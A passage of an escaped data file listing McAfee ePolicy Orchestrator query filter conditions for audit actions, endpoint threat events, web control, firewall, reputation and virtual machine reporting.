\\\\\\\"Download Keystore File\\\\\\\" or Action Equals \\\\\\\"Edit Agent Handler Assignment Rule\\\\\\\" or Action Equals 
\\\\\\\"Edit event filtering settings\\\\\\\" or Action Equals \\\\\\\"Export Agent Handler Rule\\\\\\\" or Action Equals \\\\\\\"Export Key\\\\\\\" or Action Equals \\\\\\\"Export Public Key\\\\\\\" or Action Equals \\\\\\\"Import Agent Handler Rule\\\\\\\" or Action Equals \\\\\\\"Import Key\\\\\\\" or Action Equals \\\\\\\"Modify server ports\\\\\\\" or Action Equals \\\\\\\"New Server\\\\\\\" or Action Equals \\\\\\\"Restore Keystore\\\\\\\" or Action Equals \\\\\\\"Set master key\\\\\\\" or Action Equals \\\\\\\"Update Server Certificate\\\\\\\") and Completion Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"((Action Equals \\\\\\\"Upload Extension\\\\\\\" or Action Equals \\\\\\\"Uninstall Extension\\\\\\\" or Action Equals \\\\\\\"Install Extension\\\\\\\" or Action Equals \\\\\\\"Check-in package\\\\\\\" or Action Equals \\\\\\\"Delete package\\\\\\\" or Action Equals \\\\\\\"Repository Pull\\\\\\\" or Action Equals \\\\\\\"Add repository\\\\\\\" or Action Equals \\\\\\\"Edit repository\\\\\\\" or Action Equals \\\\\\\"Delete repository\\\\\\\" or Action Equals \\\\\\\"Repository Replication\\\\\\\" or Action Equals \\\\\\\"Change credentials\\\\\\\" or Action Equals \\\\\\\"Import repository\\\\\\\" or Action Equals \\\\\\\"Check in software package\\\\\\\" or Action Equals \\\\\\\"Delete Software Package\\\\\\\") and Completion Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"((Action Equals \\\\\\\"Backup Keystore\\\\\\\" or Action Equals \\\\\\\"Export Key\\\\\\\" or Action Equals \\\\\\\"Import Key\\\\\\\" or Action Equals \\\\\\\"Add Permission Set\\\\\\\" or Action Equals \\\\\\\"Duplicate Permission Set\\\\\\\" or Action Equals \\\\\\\"Modify Permission Set\\\\\\\" or Action Equals \\\\\\\"New User\\\\\\\" or Action Equals \\\\\\\"Update User\\\\\\\" or Action Equals \\\\\\\"Change Password\\\\\\\" or Action Equals \\\\\\\"Remove User\\\\\\\" or Action Equals \\\\\\\"Change Permission Sets for User\\\\\\\" or Action Equals 
\\\\\\\"Purge Audit Log\\\\\\\" or Action Equals \\\\\\\"Purge Threat Event Log\\\\\\\") and Start Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event Category Belongs to Malware and Event Generated Time Is within the last 1 Quarters)\\\",\\r\\n\\t\\t\\t\\\"Product Equals McAfee Agent \\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"((Action Equals \\\\\\\"Assign policy\\\\\\\" or Action Equals \\\\\\\"Remove policy assignment\\\\\\\" or Action Equals \\\\\\\"Add policy assignment rule\\\\\\\" or Action Equals \\\\\\\"Delete policy assignment rule\\\\\\\" or Action Equals \\\\\\\"Edit policy assignment rule\\\\\\\" or Action Equals \\\\\\\"Edit Policy Assignment Rule Priority\\\\\\\") and Start Time Is within the last 1 Months and User Name Does not equal \\\\\\\"system\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Sequence Errors Greater than 25 \\\",\\r\\n\\t\\t\\t\\\"(Last Sequence Error Is not within the last 1 Weeks and Sequence Errors Greater than 0 )\\\",\\r\\n\\t\\t\\t\\\"Managed State Equals Unmanaged\\\",\\r\\n\\t\\t\\t\\\"((Status Equals Failed or Status Equals ?) 
and Name Starts with \\\\\\\"Check In Components\\\\\\\" and Source Equals Software Catalog)\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"((Event ID Equals 2411 or Event ID Equals 2412 ) and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 2413 and Event Generated Time Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 2412 and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 2402 and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"((Event ID Equals 2401 or Event ID Equals 2402 ) and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"Type Equals Distributed\\\",\\r\\n\\t\\t\\t\\\"(Action Equals \\\\\\\"New system\\\\\\\" and Completion Time Is before now)\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Event Category Does not belong to Operational\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 2402 , 2401 and Event Generated Time Is within the last 2 Months)\\\",\\r\\n\\t\\t\\t\\\"(Last Communication Is not within the last 1 Months and Managed State Equals Managed)\\\",\\r\\n\\t\\t\\t\\\"Managed State Equals Managed\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event Category Does not belong to Operational and Event Received Time Is within the last 2 Weeks)\\\",\\r\\n\\t\\t\\t\\\"(Policy Enforcement Status Equals 0 and Event ID Equals 2422 )\\\",\\r\\n\\t\\t\\t\\\"(Property Collection Status Equals 0 and Event ID Equals 2427 )\\\",\\r\\n\\t\\t\\t\\\"(Event Type Equals \\\\\\\"DAT\\\\\\\" or Event Type Equals \\\\\\\"Engine\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"((Event Type Does not equal \\\\\\\"Plugin\\\\\\\" and Event Type Does not equal \\\\\\\"Uninstall\\\\\\\") and Error Code Equals Deployment/Update Successful and Site Name Value is not blank 
)\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"Web Control Hotfixes Value is not blank \\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Event ID Equals 18600 and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and System Name Value is not blank and (Action Equals Allowed or Action Equals Warned-continued or Action Equals Invoked On-Demand Scan))\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Rating Equals Red and (Action Equals Allowed or Action Equals Warned-continued) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Rating Equals Yellow and (Action Equals Allowed or Action Equals Warned-continued) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Rating Equals Unknown rating type and (Action Equals Allowed or Action Equals Warned-continued) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Action Equals Blocked and Rating Equals Red and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Event ID Equals 18600 and Action Equals Warned-continued and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Action Equals Blocked and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and 
Reason Equals On a list and List Type Equals Prohibited and Action Equals Blocked and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Reason Equals On a list and List Type Equals Authorized and (Action Equals Allowed or Action Equals Warned-continued) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Rating Equals Red and (Action Equals Allowed or Action Equals Warned-continued) and Reason Equals On a list and List Type Equals Authorized and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Event ID Equals 18600 and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Action Equals Warned-cancelled and Event ID Equals 18600 and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and Rating Equals Red and (Action Equals Allowed or Action Equals Warned-continued or Action Equals Invoked On-Demand Scan) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and Rating Equals Yellow and (Action Equals Allowed or Action Equals Warned-continued or Action Equals Invoked On-Demand Scan) and 
System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and Rating Equals Unknown rating type and (Action Equals Allowed or Action Equals Warned-continued or Action Equals Invoked On-Demand Scan) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Event ID Equals 18600 and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35104 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35105 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35107 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Blocked and Event ID Is any of 35104 )\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Allowed and Event ID Is any of 35105 )\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Cleaned and Event ID Is any of 35107 )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35102 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35103 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35106 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Success Equals False and Start Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"Last Update Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"Last Update Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Event Category Does not belong to Operational and Event ID Does not equal 34928 ) and Event Generated Time Is within the last 1 
Days)\\\",\\r\\n\\t\\t\\t\\\"(((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Event Category Does not belong to Operational and Event ID Does not equal 34928 ) and Event Generated Time Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Days and (Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Threat Name Value is not blank and Event Category Does not belong to Operational and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and (Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Threat Name Value is not blank and Event Category Does not belong to Operational and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Does not equal 34928 and Event Generated Time Is within the last 2 Days)\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 2 Weeks and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and (Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Product Equals Endpoint Security Common or Product Equals Endpoint Security Threat Prevention or Product Equals 
Endpoint Security Firewall or Product Equals Endpoint Security Web Control )\\\",\\r\\n\\t\\t\\t\\\"(Product Equals Endpoint Security Common or Product Equals Endpoint Security Threat Prevention or Product Equals Endpoint Security Firewall or Product Equals Endpoint Security Web Control )\\\",\\r\\n\\t\\t\\t\\\"ESP Hotfix Value is not blank \\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and Event ID Is any of 18051 , 18052 , 18053 , 18054 , 18055 , 18056 )\\\",\\r\\n\\t\\t\\t\\\"On-Demand Full Scan Date Is within the last 1 Weeks\\\",\\r\\n\\t\\t\\t\\\"On-Demand Quick Scan Date Is within the last 1 Weeks\\\",\\r\\n\\t\\t\\t\\\"(On-Demand Full Scan Date Is not within the last 1 Weeks and On-Demand Full Scan Date Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(On-Demand Full Scan Date Is not within the last 1 Months or On-Demand Full Scan Date Value is blank )\\\",\\r\\n\\t\\t\\t\\\"(OS Type Starts with \\\\\\\"Windows\\\\\\\" or OS Type Starts with \\\\\\\"Linux\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"OS Type Starts with \\\\\\\"Windows\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"OS Type Starts with \\\\\\\"Windows\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 3 Months and Event Category Does not belong to Operational and Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Does not equal 34928 and Module Name Equals Threat Prevention)\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 2 Quarters and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type 
Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Event ID Equals 1092 or Event ID Equals 1095 ))\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event 
Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Threat Source Host Name Does not equal \\\\\\\"_\\\\\\\" and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Event ID Equals 18051 or Event ID Equals 18052 or Event ID Equals 18053 or Event ID Equals 18054 or Event ID Equals 18055 or Event ID Equals 18056 ))\\\",\\r\\n\\t\\t\\t\\\"Threat Prevention Hotfix Value is not blank 
\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Policy Enforcement Mode Equals Policy Bypassed\\\",\\r\\n\\t\\t\\t\\\"((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Equals 35001 and Analyzer Detection Method Equals \\\\\\\"Firewall\\\\\\\") and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Is any of 35000 , 35001 , 35002 and Analyzer Detection Method Equals \\\\\\\"Firewall\\\\\\\") and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"((Analyzer McAfee GTI Query Equals True and Module Name Equals Firewall) and Event Generated Time Is within the last 6 Months)\\\",\\r\\n\\t\\t\\t\\\"((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Equals 35002 and Analyzer Detection Method Equals \\\\\\\"Firewall\\\\\\\") and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(LeafNodeId Greater than or equals 1 and Last Changed Is before now)\\\",\\r\\n\\t\\t\\t\\\"LeafNodeId Greater than or equals 1 \\\",\\r\\n\\t\\t\\t\\\"LeafNodeId Greater than or equals 1 \\\",\\r\\n\\t\\t\\t\\\"LeafNodeId Greater than or equals 1 \\\",\\r\\n\\t\\t\\t\\\"LeafNodeId Greater than or equals 1 \\\",\\r\\n\\t\\t\\t\\\"Firewall Status Equals Enabled\\\",\\r\\n\\t\\t\\t\\\"Firewall Hotfixes Value is not blank \\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Cleanup Date Is before now\\\",\\r\\n\\t\\t\\t\\\"((Composite Reputation Equals Most Likely Malicious or Composite Reputation Equals Might be Malicious) and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Last access Is within the last 1 Months and (Composite Reputation Equals Might be 
Malicious or Composite Reputation Equals Most Likely Malicious))\\\",\\r\\n\\t\\t\\t\\\"(First contact Is within the last 1 Months and (Composite Reputation Equals Might be Malicious or Composite Reputation Equals Most Likely Malicious))\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Last access Is within the last 1 Months and Composite Reputation Equals Unknown)\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Would Block and Event ID Is any of 35102 )\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Allowed and Event ID Is any of 35103 )\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Would Clean and Event ID Is any of 35106 )\\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35104 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35102 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35105 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35103 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35107 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35106 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35104 , 35105 , 35107 , 35112 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35102 , 35103 , 35106 , 35111 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35104 , 35105 , 35107 , 35112 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35102 , 35103 , 35106 , 35111 \\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 34928 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(First contact Is within the last 1 Months and Composite Reputation Equals Unknown)\\\",\\r\\n\\t\\t\\t\\\"(ATD Reputation Value is not blank and Last access Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"Tags Tag Contains \\\\\\\"TIESERVER\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Tags Tag Contains \\\\\\\"TIESERVER\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Tags Tag Contains \\\\\\\"TIESERVER\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Tags Tag Contains 
\\\\\\\"TIESERVER\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"User Privileged Permissions Equals Monitor Only\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals GTI Certificate and Created Date Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"((Reputation Equals Known Malicious or Reputation Equals Might be Malicious or Reputation Equals Most Likely Malicious or Reputation Equals Unknown or Reputation Equals Not Set) and Created Date Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals Enterprise Certificate and Reputation Count Greater than 0 )\\\",\\r\\n\\t\\t\\t\\\"(CTD Reputation Value is not blank and Last access Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Max Fail Attempt Count Does not equal 0 and Count of Failed Attempts Does not equal 0 )\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 2412 , 2411 and Event Type Equals \\\\\\\"Install\\\\\\\" and Product Name Equals \\\\\\\"MCPAGENT1000\\\\\\\" and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Tags Tag Contains \\\\\\\"TIESERVER\\\\\\\" and Product Version (McAfee DXL Broker) Greater than or equals \\\\\\\"1\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"((Enterprise Reputation Value is not blank and Enterprise Reputation Does not equal Not Set) and Last access Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Is any of 35000 , 35001 , 35002 and Analyzer Detection Method Equals \\\\\\\"Firewall\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 2 Weeks and Tags Tag Contains \\\\\\\"dc_vm_auto\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Tags Has tag 
\\\\\\\"\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"(Node Type Equals \\\\\\\"Hypervisor\\\\\\\" and Property Name Equals \\\\\\\"trustattestation\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"AV Protection By Does not equal Unprotected\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 2 Weeks and Tags Tag Contains \\\\\\\"dc_vm_auto\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Vendor Equals VMware vSphere\\\",\\r\\n\\t\\t\\t\\\"((GTI Reputation Value is not blank and GTI Reputation Does not equal Not Set) and Refresh Date Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"Cleanup Date Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"First contact Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"((Enterprise Reputation Value is not blank and Enterprise Reputation Does not equal Not Set) and Refresh Date Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"ATD Reputation Value is not blank \\\",\\r\\n\\t\\t\\t\\\"Refresh Date Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"(ATD Reputation Value is not blank and Refresh Date Is within the last 3 Months)\\\",\\r\\n\\t\\t\\t\\\"(ATD Reputation Value is not blank and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"CTD Reputation Value is not blank \\\",\\r\\n\\t\\t\\t\\\"Refresh Date Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"(CTD Reputation Value is not blank and Refresh Date Is within the last 3 Months)\\\",\\r\\n\\t\\t\\t\\\"(CTD Reputation Value is not blank and First contact Is within the last 1 
Months)\\\",\\r\\n\\t\\t\\t\\\"((GTI Reputation Equals Known Trusted Installer or GTI Reputation Equals Known Trusted or GTI Reputation Equals Most Likely Trusted or GTI Reputation Equals Might be Trusted) and (Enterprise Reputation Equals Known Trusted Installer or Enterprise Reputation Equals Known Trusted or Enterprise Reputation Equals Most Likely Trusted or Enterprise Reputation Equals Might be Trusted))\\\",\\r\\n\\t\\t\\t\\\"((GTI Reputation Equals Known Malicious or GTI Reputation Equals Most Likely Malicious or GTI Reputation Equals Might be Malicious) and (Enterprise Reputation Equals Known Malicious or Enterprise Reputation Equals Most Likely Malicious or Enterprise Reputation Equals Might be Malicious))\\\",\\r\\n\\t\\t\\t\\\"((Enterprise Reputation Equals Known Malicious or Enterprise Reputation Equals Most Likely Malicious or Enterprise Reputation Equals Might be Malicious) and (GTI Reputation Equals Known Trusted 